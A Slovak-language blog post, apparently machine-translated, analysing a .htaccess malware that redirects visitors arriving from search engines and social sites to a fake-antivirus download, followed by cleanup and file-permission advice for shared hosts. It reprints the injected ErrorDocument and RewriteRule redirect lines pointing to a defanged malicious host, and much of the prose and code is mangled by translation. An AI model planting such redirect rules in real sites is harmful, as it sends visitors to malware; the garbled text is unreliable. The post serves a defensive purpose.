Malvér / vírus - .htaccess „prepíše“ a presmeruje

Nová forma vírusu ktorí vidia, že nevie, veľmi silno ovplyvňuje weby hostované na nespoľahlivé servery kde medzi nimi možno „vidieť“ používateľské účty / účty subdomény. Konkrétne, hostiteľské účty sú všetky umiestnené v priečinku „vhosts“, A právo na písanie užívateľská zložka „vhosts“ dáva bežnému používateľovi… predajca vo väčšine situácií. Je to typická metóda webových serverov, ktoré sa nepoužívajú WHM / cPanel.

Akcia vírusu .Htaccess - hackovanie .htaccess

Vírus ovplyvňuje súbory .htaccess obeť miesto. Riadky / Smernica na presmerovanie návštevníkov (pochádzajú zo stránok a portálov s vysokou prevádzkou yahoo, msn, google, facebook, yaindex, twitter, myspace atď.) na niektoré stránky, ktoré ponúkajú „antivírus„. Je to o falošný antivírus, O ktorom som písal v úvode .

Tu je to, čo to vyzerá ako .htaccess vplyv: (nemá prístup k obsahu riadky nižšie uvedených odkazov)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress* $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vyhľadávanie. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

PrepísaťCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_FILENAME}! -D
RewriteCond% {REQUEST_FILENAME} !. * Jpg $ |. * Gif $ |. * Png $
PrepísaťCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Tí, ktorí používajú WordPress tieto riadky nájdu v súbore .htaccess z public_html. Okrem toho, vírus vytvorí. Htaccess v rovnakej zložke wp-content.

*K dispozícii sú tiež k situáciám, v ktorých sa objaví miesto peoriavascularsurgery.com dns.thesoulfoodcafe.com alebo iné adresy.

Čo robí tento vírus.

Po presmerovanie, je návštevník privítal s otvorenou náručou správou:

Varovanie!
Váš počítač obsahuje rôzne príznaky prítomnosti vírusov a škodlivých programov. tvoj system vyžaduje okamžitú antivírusovú kontrolu!
System Zabezpečenie vykoná rýchlu a bezplatnú kontrolu vášho počítača na prítomnosť vírusov a škodlivých programov.

1 malware

Bez ohľadu na to, ktoré tlačidlo stlačíme, dostaneme sa na stránku “my Computer", Vytvorené tak, aby napodobňovalo XP dizajnu. Tu sa automaticky spustí „proces skenovania“, na konci ktorého zistíme, že „sme infikovaní“.

2 malware

Po kliknutí na tlačidlo OK alebo Zrušiť, začne Stiahnuť ▼Súbor je setup.exe. Tento setup.exe je falošný anti vírus ovplyvňujúce systém. Nainštalujte malware šíriť ďalšie napadnuté odkazy, a okrem nich anti-virus softvér (tiež falošné), ktoré je obeť vyzvaná k nákupu.
Tí, ktorí už kontaktovali vírus môže použiť tento formulár . Odporúča sa tiež, aby naskenovať celý HDD. Odporučiť Kaspersky Internet Security alebo Kaspersky Anti-Virus.

Tento typ vírusu ovplyvňuje návštev OS operačné systémy Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Zatiaľ nie sú známe žiadne prípady infekcie operačných systémov Windows Pohľad áno Windows 7.

Ako môžeme odstrániť tento vírus. Htaccess na serveri a ako, aby sa zabránilo infekcii.

1. Analyzovať podozrivé súbory a mazanie kódov. Ak chcete zabezpečiť, že súbor nie je ovplyvnená len .htaccess by ste mali analyzovať všetky súbory . Php si . Js.

2. Prepísať súbor. Htaccess a nastavte chmod 644 alebo 744 s prístup pre zápis len vlastníka užívateľa.

3. Keď vytvoríte hosťovaní do úvahy pre webové stránky v priečinku / Home alebo / Webroot Tým sa automaticky vytvorí zložku, ktorá má často užívateľské meno (užívateľ pre cPanel, ftpAtď). Ak chcete zabrániť písanie dát a prenosu vírusov z jedného užívateľa na iného, ​​sa odporúča, aby každý užívateľ zložku, ktorú chcete nastaviť:

chmod 644 alebo 744, 755 - uvedené je 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all spôsoby, ako skontrolovať, či boli vykonané správne. By sa mali objaviť niečo takéto:

drwx - x - x 12 dinamics dinamics 4096 6. mája 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7. marca 07:46 duran /
drwx - x - x 12 skúmavka skúmavka 4096 29. januára 11:23 skúmavka /
drwxr-xr-x 14 expresný expres 4096 26. február 2009 expresný /
drwxr-xr-x 9 ezo ezo 4096 19. mája 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. decembra 22:29 farma /

Ak jeden z vyššie bude userele FTP infikované súboryTo nemôže odoslať vírus iného užívateľa hostiteľa. Je minimálne bezpečnostné opatrenia na ochranu účtov hostované na webovom serveri.

Spoločné prvky oblastí postihnutých týmto vírusom.

Všetky ovplyvnené domény presmerovávajú návštevníkov na stránky, ktoré obsahujú „/main.php? e = 4 & H".

Toto “vírus. htaccess”Ovplyvňuje akýkoľvek typ CMS (Joomla, WordPress, phpBBAtď) pomocou .htaccess

.htaccess Virus Hack & Redirect.

Zakladateľ a editor Stealth Settings, od roku 2006 do súčasnosti. Skúsenosti s operačnými systémami Linux (najmä CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Pridať komentár